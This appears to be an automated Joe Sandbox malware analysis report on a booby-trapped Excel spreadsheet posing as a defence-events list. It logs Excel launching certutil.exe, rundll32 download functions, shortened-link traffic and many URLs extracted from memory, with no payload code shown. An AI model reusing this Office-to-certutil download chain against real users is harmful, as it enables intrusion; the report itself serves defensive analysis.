Analysis Report

Overview

General Information

Joe Sandbox Version:	22.0.0
Analysis ID:	48489
Start time:	09:55:47
Joe Sandbox Product:	CloudBasic
Start date:	01.03.2018
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Upcoming Events February 2018.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled GSI enabled (VBA)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.evad.expl.troj.winXLS@9/42@41/6
HCA Information:	Successful, ratio: 99% Number of executed functions: 65 Number of non-executed functions: 44
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 93.9%) Quality average: 81.3% Quality standard deviation: 28.1%
Cookbook Comments:	Adjust boot time Found application associated with file extension: .xls Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 124 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE, OUTLOOK.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	80	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Upcoming Events February 2018.xls

virustotal: Detection: 61%

Perma Link

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_10002D8F CryptBinaryToStringA,CryptBinaryToStringA,		5_2_10002D8F
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_10002D4B CryptStringToBinaryA,CryptStringToBinaryA,		5_2_10002D4B

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Drops certificate files (DER)

Show sources

Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8A574ED5927B3CEC9626151D220C7448
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D7B4E43171BB9E412497B0377F4343E7
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_766B34AE9771D7C6A6B5C01F1CA544C4
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: google.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49163 -> 172.217.3.174:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49163 -> 172.217.3.174:443

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\certutil.exe

Networking:

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_10004CB8 InternetOpenA,InternetConnectA,HttpOpenRequestA,lstrlenA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,

5_2_10004CB8

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\18GSS_Janes[1].htm

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /events?page=1 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateHost: www.janes.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /18GSS_Janes HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateHost: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /us HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.globalsofsymposium.org
Source: global traffic	HTTP traffic detected: GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAbAYYM2%2B27i HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/6.1Host: clients1.google.com
Source: global traffic	HTTP traffic detected: GET /GIAG2.crl HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/6.1Host: pki.google.com

Found strings which match to known social media urls

Show sources

Source: rundll32.exe	String found in binary or memory: *.youtube.com equals www.youtube.com (Youtube)
Source: rundll32.exe	String found in binary or memory: -nocookie.com.youtube.com.youtub, equals www.youtube.com (Youtube)
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: </span></a></li><li class=gbt><a onclick=gbar.logger.il(1,{t:36}); class=gbzt id=gb_36 href="https://www.youtube.com/results?gl=UA&tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a onclick=gbar.logger.il(1,{t:5}); class=gbzt id=gb_5 href="https://news.google.com.ua/nwshp?hl=uk&tab=wn"><span class=gbtb2></span><span class=gbts> equals www.youtube.com (Youtube)
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: rundll32.exe	String found in binary or memory: youtube.com equals www.youtube.com (Youtube)
Source: rundll32.exe	String found in binary or memory: youtube.comyoutubeeducation.comY equals www.youtube.com (Youtube)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: google.com

Urls found in memory or binary data

Show sources

Source: EXCEL.EXE	String found in binary or memory: file:///8
Source: EXCEL.EXE	String found in binary or memory: file:///C:
Source: EXCEL.EXE	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/Upcoming%20Events%20February%202018.xls
Source: EXCEL.EXE	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/Upcoming%20Events%20February%202018.xlsre
Source: OUTLOOK.EXE	String found in binary or memory: file://REPORT.IPM.Note.DR
Source: rundll32.exe	String found in binary or memory: http://
Source: EXCEL.EXE	String found in binary or memory: http://Myserver/Mydoc.htm
Source: EXCEL.EXE	String found in binary or memory: http://Na&me:A
Source: EXCEL.EXE	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: EXCEL.EXE	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://bit.ly/18GSS_Janes
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/18GSS_Janes)I
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/18GSS_Janes00
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/18GSS_Janes02qI
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/18GSS_JanesII
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/18GSS_JanesQI
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/18GSS_Janesx
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://bit.ly/18GSS_JanesyX
Source: EXCEL.EXE	String found in binary or memory: http://bit.ly/K
Source: EXCEL.EXE	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: EXCEL.EXE	String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: EXCEL.EXE	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: rundll32.exe, 8059E9A0D314877E40FE93D8CCFB3C69_766B34AE9771D7C6A6B5C01F1CA544C4.5.dr	String found in binary or memory: http://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFh
Source: rundll32.exe	String found in binary or memory: http://clients1.google.com/ocsp0
Source: rundll32.exe	String found in binary or memory: http://clients1.google.com/ocsphttp://pki.google.com/GIAG2.crl
Source: EXCEL.EXE	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: EXCEL.EXE	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: EXCEL.EXE	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: EXCEL.EXE	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodo.net/AAACertificateServices.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodo.net/TrustedCertificateServices.crl0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 23B523C9E7746F715D33C6527C18EB9D.5.dr	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl
Source: rundll32.exe	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0N
Source: rundll32.exe	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crlD
Source: EXCEL.EXE	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.usertrust.com/AddTrustExternalCARoot.crl05
Source: EXCEL.EXE	String found in binary or memory: http://crl.usertrust.com/UTN-DATACorpSGC.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Hardware.crl01
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: EXCEL.EXE	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: EXCEL.EXE	String found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
Source: EXCEL.EXE	String found in binary or memory: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/02FAF3E291435468607857694DF5E
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/AFE5D244A8D1194230FF479FE2F89
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?335f900d6c442
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabA
Source: rundll32.exe, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: rundll32.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab3
Source: EXCEL.EXE	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7d09b40
Source: rundll32.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?fdb2309
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: EXCEL.EXE	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: EXCEL.EXE	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: EXCEL.EXE	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: EXCEL.EXE	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: rundll32.exe	String found in binary or memory: http://g
Source: rundll32.exe	String found in binary or memory: http://g.symcb.com/crls/gtglobal.crl
Source: rundll32.exe	String found in binary or memory: http://g.symcb.com/crls/gtglobal.crl0
Source: rundll32.exe, 828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.5.dr	String found in binary or memory: http://g.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXE
Source: rundll32.exe	String found in binary or memory: http://g.symcd.com0
Source: rundll32.exe	String found in binary or memory: http://g.symcd.comhttp://g.symcb.com/crls/gtglobal.crl
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: EXCEL.EXE	String found in binary or memory: http://ocsp.comodoca.com0=
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://ocsp.entrust.net0D
Source: EXCEL.EXE	String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: EXCEL.EXE	String found in binary or memory: http://ocsp.pki.gva.es0
Source: EXCEL.EXE	String found in binary or memory: http://ocsp.usertrust.com0
Source: EXCEL.EXE	String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: rundll32.exe	String found in binary or memory: http://pki.google.com/GIAG2.crl
Source: rundll32.exe	String found in binary or memory: http://pki.google.com/GIAG2.crl0
Source: rundll32.exe	String found in binary or memory: http://pki.google.com/GIAG2.crt0
Source: EXCEL.EXE	String found in binary or memory: http://qual.ocsp.d-trust.net0
Source: EXCEL.EXE	String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: EXCEL.EXE	String found in binary or memory: http://repository.swisssign.com/0
Source: EXCEL.EXE	String found in binary or memory: http://sc
Source: EXCEL.EXE	String found in binary or memory: http://scas.openformatrg/drawml/2006/main
Source: rundll32.exe, search[1].htm0.5.dr, search[1].htm.5.dr	String found in binary or memory: http://schema.org/SearchResultsPage
Source: EXCEL.EXE	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE	String found in binary or memory: http://users.ocsp.d-trust.net03
Source: EXCEL.EXE	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: EXCEL.EXE	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: EXCEL.EXE	String found in binary or memory: http://www.a-cert.at0E
Source: EXCEL.EXE	String found in binary or memory: http://www.acabogacia.org/doc0
Source: EXCEL.EXE	String found in binary or memory: http://www.acabogacia.org0
Source: EXCEL.EXE	String found in binary or memory: http://www.ancert.com/cps0
Source: EXCEL.EXE	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: EXCEL.EXE	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: EXCEL.EXE	String found in binary or memory: http://www.certicamara.com0
Source: EXCEL.EXE	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certifikat.dk/repository0
Source: EXCEL.EXE	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.chambersign.org1
Source: EXCEL.EXE	String found in binary or memory: http://www.comsign.co.il/cps0
Source: EXCEL.EXE	String found in binary or memory: http://www.crc.bg0
Source: EXCEL.EXE	String found in binary or memory: http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.d-trust.net/crl/d-trust_root_class_3_ca_2007.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.d-trust.net0
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.defexpoindia.in/
Source: EXCEL.EXE	String found in binary or memory: http://www.defexpoindia.in/H
Source: EXCEL.EXE	String found in binary or memory: http://www.defexpoindia.in/Upcoming
Source: EXCEL.EXE	String found in binary or memory: http://www.defexpoindia.in/http://bit.ly/18GSS_Janes
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.defexpoindia.in/yX
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EXCEL.EXE	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: EXCEL.EXE	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.disig.sk/ca0f
Source: EXCEL.EXE	String found in binary or memory: http://www.dnie.es/dpc0
Source: EXCEL.EXE	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: EXCEL.EXE	String found in binary or memory: http://www.e-me.lv/repository0
Source: EXCEL.EXE	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: EXCEL.EXE	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: EXCEL.EXE	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: EXCEL.EXE	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: EXCEL.EXE	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: EXCEL.EXE	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.firmaprofesional.com0
Source: EXCEL.EXE	String found in binary or memory: http://www.globalsofsymposiu
Source: EXCEL.EXE	String found in binary or memory: http://www.globalsofsymposium.org/
Source: EXCEL.EXE	String found in binary or memory: http://www.globalsofsymposium.org/UK
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.globalsofsymposium.org/us#1
Source: EXCEL.EXE	String found in binary or memory: http://www.globalsofsymposium.org/us#1-
Source: EXCEL.EXE	String found in binary or memory: http://www.globalsofsymposium.org/us1-
Source: EXCEL.EXE	String found in binary or memory: http://www.globalsofsymposium.org/use/6
Source: EXCEL.EXE	String found in binary or memory: http://www.globaltrust.info0
Source: EXCEL.EXE	String found in binary or memory: http://www.globaltrust.info0=
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: http://www.google.com.ua/history/optout?hl=uk
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: http://www.google.com.ua/preferences?hl=uk
Source: EXCEL.EXE	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.internationalarmouredvehicles.com/
Source: EXCEL.EXE	String found in binary or memory: http://www.internationalarmouredvehicles.com/8
Source: EXCEL.EXE	String found in binary or memory: http://www.internationalarmouredvehicles.com/Xt
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.internationalarmouredvehicles.com/yX
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/eve
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.janes.com/events?page=1
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1PFhttp://www.janes.com/events?page=1
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1PFhttp://www.janes.com/events?page=1(
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1PFhttp://www.janes.com/events?page=1PFhttp://www.janes.com/events?
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1PFhttp://www.janes.com/events?page=1PHhttp://www.maritime-recon.co
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1T
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1http://www.janes.com/events?page=1http://www.janes.com/events?page
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1http://www.janes.com/events?page=1http://www.mobiledeployable.com/
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com/events?page=1p
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.janes.com/events?page=1yX
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.com8
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.comhkEAlQAAAMiGQQBRAAAA6HFBABAAAADUhkEAUgAAAMhyQQAtAAAA4IZBAHIAAADockEAMQAAAOyGQQB4
Source: EXCEL.EXE	String found in binary or memory: http://www.janes.coml
Source: EXCEL.EXE	String found in binary or memory: http://www.maritime-recon.com
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.maritime-recon.com/janes
Source: EXCEL.EXE	String found in binary or memory: http://www.maritime-recon.com/janes(
Source: EXCEL.EXE	String found in binary or memory: http://www.maritime-recon.com/janes.
Source: EXCEL.EXE	String found in binary or memory: http://www.maritime-recon.com/janesDa
Source: EXCEL.EXE	String found in binary or memory: http://www.maritime-recon.com/janesPFhttp://www.janes.com/events?page=1PFhttp://www.janes.com/events
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.maritime-recon.com/janesyX
Source: EXCEL.EXE	String found in binary or memory: http://www.maritime-ref
Source: EXCEL.EXE	String found in binary or memory: http://www.microsoft.
Source: EXCEL.EXE	String found in binary or memory: http://www.mob
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.mobiledeployable.com/janes
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.mobiledeployable.com/janes?
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.mobiledeployable.com/janes?yX
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.mobiledeployable.com/janesyX
